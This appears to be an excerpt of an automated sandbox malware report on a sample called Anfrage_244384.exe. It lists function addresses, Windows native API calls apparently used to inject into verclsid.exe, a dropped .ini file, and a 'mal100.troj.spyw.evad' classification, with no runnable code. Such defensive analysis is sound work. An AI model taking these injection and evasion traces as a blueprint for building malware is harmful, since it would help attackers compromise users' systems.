Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2EE0 NtQueueApcThread,LdrInitializeThunk,		7_2_045D2EE0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2E80 NtReadVirtualMemory,LdrInitializeThunk,		7_2_045D2E80
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2F30 NtCreateSection,LdrInitializeThunk,		7_2_045D2F30
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2FE0 NtCreateFile,LdrInitializeThunk,		7_2_045D2FE0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2FB0 NtResumeThread,LdrInitializeThunk,		7_2_045D2FB0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2AD0 NtReadFile,LdrInitializeThunk,		7_2_045D2AD0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2AF0 NtWriteFile,LdrInitializeThunk,		7_2_045D2AF0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2B60 NtClose,LdrInitializeThunk,		7_2_045D2B60
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,		7_2_045D2BF0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2BE0 NtQueryValueKey,LdrInitializeThunk,		7_2_045D2BE0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2BA0 NtEnumerateValueKey,LdrInitializeThunk,		7_2_045D2BA0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D35C0 NtCreateMutant,LdrInitializeThunk,		7_2_045D35C0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D39B0 NtGetContextThread,LdrInitializeThunk,		7_2_045D39B0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2C00 NtQueryInformationProcess,		7_2_045D2C00
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2CC0 NtQueryVirtualMemory,		7_2_045D2CC0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2CF0 NtOpenProcess,		7_2_045D2CF0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2D00 NtSetInformationFile,		7_2_045D2D00
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2DB0 NtEnumerateKey,		7_2_045D2DB0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2E30 NtWriteVirtualMemory,		7_2_045D2E30
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2EA0 NtAdjustPrivilegesToken,		7_2_045D2EA0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2F60 NtCreateProcessEx,		7_2_045D2F60
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2F90 NtProtectVirtualMemory,		7_2_045D2F90
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2FA0 NtQuerySection,		7_2_045D2FA0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2AB0 NtWaitForSingleObject,		7_2_045D2AB0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2B80 NtQueryInformationFile,		7_2_045D2B80
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D3010 NtOpenDirectoryObject,		7_2_045D3010
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D3090 NtSetValueKey,		7_2_045D3090
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D3D70 NtOpenThread,		7_2_045D3D70
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D3D10 NtOpenProcessToken,		7_2_045D3D10
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003D8F80 NtCreateFile,		7_2_003D8F80
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003D90F0 NtReadFile,		7_2_003D90F0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003D91F0 NtDeleteFile,		7_2_003D91F0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003D9290 NtClose,		7_2_003D9290
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003D93F0 NtAllocateVirtualMemory,		7_2_003D93F0

Source: C:\Users\user\Desktop\Anfrage_244384.exe

Code function: 0_2_004031A3 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_004031A3

Source: C:\Users\user\Desktop\Anfrage_244384.exe

File created: C:\Windows\resources\soenderbro.ini

Jump to behavior

Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 0_2_00404959		0_2_00404959
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 0_2_0040655F		0_2_0040655F
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 0_2_00406D36		0_2_00406D36
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34671460		4_2_34671460
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473F43F		4_2_3473F43F
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34737571		4_2_34737571
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471D5B0		4_2_3471D5B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346C5630		4_2_346C5630
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347316CC		4_2_347316CC
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473F7B0		4_2_3473F7B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473F0E0		4_2_3473F0E0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347370E9		4_2_347370E9
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346870C0		4_2_346870C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472F0CC		4_2_3472F0CC
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B516C		4_2_346B516C
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F172		4_2_3466F172
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3474B16B		4_2_3474B16B
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3468B1B0		4_2_3468B1B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347212ED		4_2_347212ED
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469B2C0		4_2_3469B2C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346852A0		4_2_346852A0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466D34C		4_2_3466D34C
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473132D		4_2_3473132D
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346C739A		4_2_346C739A
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F9C32		4_2_346F9C32
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473FCF2		4_2_3473FCF2
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34737D73		4_2_34737D73
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34683D40		4_2_34683D40
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34731D5A		4_2_34731D5A
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469FDC0		4_2_3469FDC0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34689EB0		4_2_34689EB0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473FF09		4_2_3473FF09
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34643FD5		4_2_34643FD5
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34643FD2		4_2_34643FD2
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473FFB1		4_2_3473FFB1
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34681F92		4_2_34681F92
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346ED800		4_2_346ED800
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346838E0		4_2_346838E0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34689950		4_2_34689950
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469B950		4_2_3469B950
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34715910		4_2_34715910
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F3A6C		4_2_346F3A6C
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34737A46		4_2_34737A46
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473FA49		4_2_3473FA49
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472DAC6		4_2_3472DAC6
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346C5AA0		4_2_346C5AA0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34721AA3		4_2_34721AA3
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471DAAC		4_2_3471DAAC
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473FB76		4_2_3473FB76
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346BDBF9		4_2_346BDBF9
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F5BF0		4_2_346F5BF0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469FB80		4_2_3469FB80
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34732446		4_2_34732446
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34724420		4_2_34724420
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472E4F6		4_2_3472E4F6
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34680535		4_2_34680535
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34740591		4_2_34740591
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469C6E0		4_2_3469C6E0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34680770		4_2_34680770
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A4750		4_2_346A4750
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467C7C0		4_2_3467C7C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34712000		4_2_34712000
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34708158		4_2_34708158
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34670100		4_2_34670100
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471A118		4_2_3471A118
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347381CC		4_2_347381CC
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347341A2		4_2_347341A2
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347401AA		4_2_347401AA
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34720274		4_2_34720274
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347002C0		4_2_347002C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473A352		4_2_3473A352
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347403E6		4_2_347403E6
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3468E3F0		4_2_3468E3F0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34680C00		4_2_34680C00
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34670CF2		4_2_34670CF2
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34720CB5		4_2_34720CB5
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3468AD00		4_2_3468AD00
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471CD1F		4_2_3471CD1F
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467ADE0		4_2_3467ADE0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34698DBF		4_2_34698DBF
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34680E59		4_2_34680E59
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473EE26		4_2_3473EE26
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473EEDB		4_2_3473EEDB
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473CE93		4_2_3473CE93
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34692E90		4_2_34692E90
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F4F40		4_2_346F4F40
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34722F30		4_2_34722F30
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346C2F28		4_2_346C2F28
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A0F30		4_2_346A0F30
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3468CFE0		4_2_3468CFE0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34672FC8		4_2_34672FC8
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346FEFA0		4_2_346FEFA0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3468A840		4_2_3468A840
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34682840		4_2_34682840
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346AE8F0		4_2_346AE8F0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346668B8		4_2_346668B8
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34696962		4_2_34696962
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346829A0		4_2_346829A0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3474A9A6		4_2_3474A9A6
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467EA80		4_2_3467EA80
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473AB40		4_2_3473AB40
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34736BD7		4_2_34736BD7
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04652446		7_2_04652446
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04644420		7_2_04644420
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0464E4F6		7_2_0464E4F6
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045A0535		7_2_045A0535
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04660591		7_2_04660591
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045BC6E0		7_2_045BC6E0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045C4750		7_2_045C4750
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045A0770		7_2_045A0770
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0459C7C0		7_2_0459C7C0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04632000		7_2_04632000
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04628158		7_2_04628158
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04590100		7_2_04590100
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0463A118		7_2_0463A118
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_046581CC		7_2_046581CC
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_046601AA		7_2_046601AA
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04640274		7_2_04640274
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_046202C0		7_2_046202C0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0465A352		7_2_0465A352
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_046603E6		7_2_046603E6
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045AE3F0		7_2_045AE3F0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045A0C00		7_2_045A0C00
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04590CF2		7_2_04590CF2
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04640CB5		7_2_04640CB5
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045AAD00		7_2_045AAD00
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0463CD1F		7_2_0463CD1F
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0459ADE0		7_2_0459ADE0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045B8DBF		7_2_045B8DBF
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045A0E59		7_2_045A0E59
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0465EE26		7_2_0465EE26
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0465EEDB		7_2_0465EEDB
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045B2E90		7_2_045B2E90
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0465CE93		7_2_0465CE93
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04614F40		7_2_04614F40
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04642F30		7_2_04642F30
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045C0F30		7_2_045C0F30
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045E2F28		7_2_045E2F28
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04592FC8		7_2_04592FC8
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045ACFE0		7_2_045ACFE0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0461EFA0		7_2_0461EFA0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045A2840		7_2_045A2840
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045AA840		7_2_045AA840
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045CE8F0		7_2_045CE8F0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045868B8		7_2_045868B8
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045B6962		7_2_045B6962
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0466A9A6		7_2_0466A9A6
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045A29A0		7_2_045A29A0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0459EA80		7_2_0459EA80
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0465AB40		7_2_0465AB40
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04656BD7		7_2_04656BD7
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04591460		7_2_04591460
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0465F43F		7_2_0465F43F
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04657571		7_2_04657571
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0463D5B0		7_2_0463D5B0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_046516CC		7_2_046516CC
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0465F7B0		7_2_0465F7B0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0465F0E0		7_2_0465F0E0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_046570E9		7_2_046570E9
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045A70C0		7_2_045A70C0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0464F0CC		7_2_0464F0CC
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0466B16B		7_2_0466B16B
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0458F172		7_2_0458F172
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D516C		7_2_045D516C
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045AB1B0		7_2_045AB1B0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_046412ED		7_2_046412ED
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045BB2C0		7_2_045BB2C0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045A52A0		7_2_045A52A0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0458D34C		7_2_0458D34C
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0465132D		7_2_0465132D
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045E739A		7_2_045E739A
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04619C32		7_2_04619C32
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0465FCF2		7_2_0465FCF2
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04657D73		7_2_04657D73
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045A3D40		7_2_045A3D40
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04651D5A		7_2_04651D5A
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045BFDC0		7_2_045BFDC0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045A9EB0		7_2_045A9EB0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0465FF09		7_2_0465FF09
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045A1F92		7_2_045A1F92
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0465FFB1		7_2_0465FFB1
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0460D800		7_2_0460D800
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045A38E0		7_2_045A38E0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045A9950		7_2_045A9950
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045BB950		7_2_045BB950
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04635910		7_2_04635910
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04613A6C		7_2_04613A6C
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04657A46		7_2_04657A46
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0465FA49		7_2_0465FA49
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0464DAC6		7_2_0464DAC6
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04641AA3		7_2_04641AA3
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0463DAAC		7_2_0463DAAC
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045E5AA0		7_2_045E5AA0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0465FB76		7_2_0465FB76
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04615BF0		7_2_04615BF0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045DDBF9		7_2_045DDBF9
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045BFB80		7_2_045BFB80
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003C1BC0		7_2_003C1BC0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003BCAC0		7_2_003BCAC0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003BCCE0		7_2_003BCCE0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003BAD60		7_2_003BAD60
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003BAEA4		7_2_003BAEA4
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003B1122		7_2_003B1122
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003C5220		7_2_003C5220
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003C3460		7_2_003C3460
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003DB8C0		7_2_003DB8C0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048BE65C		7_2_048BE65C
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048BE7EF		7_2_048BE7EF
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048BD728		7_2_048BD728
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048BE1A5		7_2_048BE1A5
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048BE2C3		7_2_048BE2C3

Source: C:\Windows\SysWOW64\verclsid.exe	Code function: String function: 045D5130 appears 58 times
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: String function: 045E7E54 appears 102 times
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: String function: 0460EA12 appears 86 times
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: String function: 0458B970 appears 280 times
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: String function: 0461F290 appears 105 times
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: String function: 346EEA12 appears 82 times
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: String function: 3466B970 appears 280 times
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: String function: 346C7E54 appears 103 times
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: String function: 346B5130 appears 58 times
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: String function: 346FF290 appears 103 times

Source: Anfrage_244384.exe

Static PE information: invalid certificate

Source: Anfrage_244384.exe, 00000004.00000003.2992504596.0000000034403000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Anfrage_244384.exe
Source: Anfrage_244384.exe, 00000004.00000002.3092495841.00000000043DF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameverclsid.exej% vs Anfrage_244384.exe
Source: Anfrage_244384.exe, 00000004.00000003.2995103933.00000000345BF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Anfrage_244384.exe
Source: Anfrage_244384.exe, 00000004.00000002.3092495841.0000000004423000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameverclsid.exej% vs Anfrage_244384.exe
Source: Anfrage_244384.exe, 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Anfrage_244384.exe

Source: Anfrage_244384.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/11@2/2

Source: C:\Users\user\Desktop\Anfrage_244384.exe

Code function: 0_2_004031A3 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_004031A3

Source: C:\Users\user\Desktop\Anfrage_244384.exe

